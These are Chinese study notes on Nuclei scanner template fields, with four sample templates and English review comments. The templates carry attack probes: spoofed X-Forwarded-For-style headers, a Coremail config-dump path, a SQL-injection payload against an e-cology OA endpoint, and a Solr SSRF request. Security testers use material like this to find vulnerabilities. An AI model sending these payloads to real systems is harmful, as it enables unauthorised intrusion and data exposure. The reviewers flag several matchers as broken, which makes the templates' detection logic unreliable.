Nuclei 模板文件 记录
1: severity: info #定义危险级别 info medium critical high
2:{{BaseURL}} 原始读取的URL
{{Hostname}} 请求头中的Host
3: redirects: true #是否跟随重定向
max-redirects: 3 #最大重定向的深度
4: matchers-condition: and #多个匹配器之间的逻辑关系（and 或 or）
5: negative: true #负匹配器：对该匹配器的结果取反
6: extractors: regex kval group: 1
7: cookie-reuse: true
# Sample template: one GET request with five client-address headers set to
# 127.0.0.1; a match is reported only when all four matchers below pass.
id: temple-get

info:
  name: get-info
  author: YanYun
  severity: medium
  tags: dir,email,java

requests:
  - method: GET
    # NOTE(review): every header here carries a client-chosen value; presumably
    # the sample checks whether the target treats them as the real client
    # address. A server should take the client address from the connection or
    # from a proxy it controls, never from these headers.
    headers:
      X-Client-IP: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Originating-IP: 127.0.0.1
    path:
      - "{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/"
    # "and": every matcher in the list must pass.
    matchers-condition: and
    matchers:
      # DSL expression: response body shorter than 1024 bytes and status 200.
      - type: dsl
        dsl:
          - "len(body)<1024 && status_code==200"
      # Repeats the status_code==200 test already made by the DSL matcher.
      - type: status
        status:
          - 200
      # "condition: and" needs both strings present; "negative: true" inverts
      # the result, so this matcher passes when they are NOT both present.
      # NOTE(review): a response that does contain the configHome element
      # fails this matcher. If the goal is to report an exposed configuration
      # dump, the logic looks inverted - confirm the intent.
      - type: word
        words:
          - '<string name="configHome">/home/coremail</string>'
          - '404'
        condition: and
        negative: true
      # Named matcher that looks for the string in the response headers.
      # NOTE(review): requiring a PHP header conflicts with the "java" tag
      # above - confirm this matcher belongs in this template.
      - type: word
        name: php
        words:
          - "X-Powered-By: PHP"
        part: header
# Sample template: one POST request (body 'admin=test') with five
# client-address headers set to 127.0.0.1; all four matchers must pass.
id: Coremail-info

info:
  name: Coremail-info
  author: YanYun
  severity: medium
  tags: dir,email,java

requests:
  - method: POST
    # NOTE(review): these headers are client-controlled. An application that
    # bases access decisions on them, without a trusted proxy overwriting
    # them, can be misled about where a request came from.
    headers:
      X-Client-IP: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Originating-IP: 127.0.0.1
    path:
      - "{{BaseURL}}/admin"
    # Request body sent with the POST.
    body: 'admin=test'
    # "and": every matcher in the list must pass.
    matchers-condition: and
    matchers:
      # DSL expression: response body shorter than 1024 bytes and status 200.
      - type: dsl
        dsl:
          - "len(body)<1024 && status_code==200"
      # Repeats the status_code==200 test already made by the DSL matcher.
      - type: status
        status:
          - 200
      # Passes when the two strings are NOT both present (negative matcher).
      # NOTE(review): nothing in this matcher set positively identifies
      # Coremail; with the negation, a short 200 response from any product
      # sending the PHP header would match - confirm before relying on it.
      - type: word
        words:
          - '<string name="configHome">/home/coremail</string>'
          - '404'
        condition: and
        negative: true
      # Named matcher that looks for the string in the response headers.
      - type: word
        name: php
        words:
          - "X-Powered-By: PHP"
        part: header
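# Sample template: one raw POST request to WorkflowCenterTreeData.jsp with a
# SQL fragment in the "formids" form field; all three matchers must pass.
id: oa-cology-sql

info:
  name: oa-cology-sql
  author: Yanyun
  severity: info
  # Key was misspelled "tages"; under that name it is not the tags field, so
  # tag-based template selection would not pick this template up.
  tags: sql,oa,java,dir

requests:
  - raw:
      # Raw request: sent as written, with {{Hostname}} filled in per target.
      # NOTE(review): Content-Length 2236 does not match the length of the
      # body shown here, and Upgrade-Insecure-Requests appears twice; confirm
      # whether the engine recomputes the length before relying on it.
      - |
        POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=test
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 2236
        Upgrade-Insecure-Requests: 1

        formids=11111111111))) select NULL,value from v$parameter order by (((1

    # "and": every matcher in the list must pass.
    matchers-condition: and
    matchers:
      # DSL expression: response body shorter than 1024 bytes and status 200.
      - type: dsl
        dsl:
          - "len(body)<1024 && status_code==200"
      # Repeats the status_code==200 test already made by the DSL matcher.
      - type: status
        status:
          - 200
      # Passes when the two strings are NOT both present (negative matcher).
      # NOTE(review): these strings are the Coremail ones used by the other
      # templates in these notes and say nothing about this request's result.
      # As written, any short 200 response matches, so a hit is not evidence
      # of SQL injection - replace with a check on the expected response.
      - type: word
        words:
          - '<string name="configHome">/home/coremail</string>'
          - '404'
        condition: and
        negative: true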
# Sample template: two raw GET requests; a value extracted by regex is stored
# as "core" and substituted into the second request's path as {{core}}.
id: CVE-2021-27905

info:
  name: Apache Solr <= 8.8.1 SSRF
  author: hackergautam
  severity: medium
  tags: cve,cve2021,apache,solr,ssrf

requests:
  - raw:
      # Request 1: fetches a login page.
      # NOTE(review): /account/login.php is not a Solr path; presumably it is
      # here only to demonstrate feeding an extracted value into request 2.
      - |
        GET /account/login.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      # Request 2: replication handler call for the core named by {{core}};
      # masterUrl is set to https://example.com.
      - |
        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    extractors:
      # Captures the value attribute of one specific hidden input field.
      # "group: 1" selects the first capture group; "internal: true" keeps the
      # value for use inside the template instead of printing it as a result.
      - type: regex
        regex:
          - '<input type="hidden" name="846c3d198c2af4004cdc58e6e5f00468d81bdda4" value="(.*?)">'
        name: core
        group: 1
        internal: true

    # "and": both matchers must pass.
    matchers-condition: and
    matchers:
      # NOTE(review): neither matcher refers to anything Solr-specific that is
      # visible here, so a match should not be read as confirmation of
      # CVE-2021-27905 without checking what these conditions are meant to
      # detect.
      - type: status
        status:
          - 404
      - type: word
        words:
          - 'tokenId'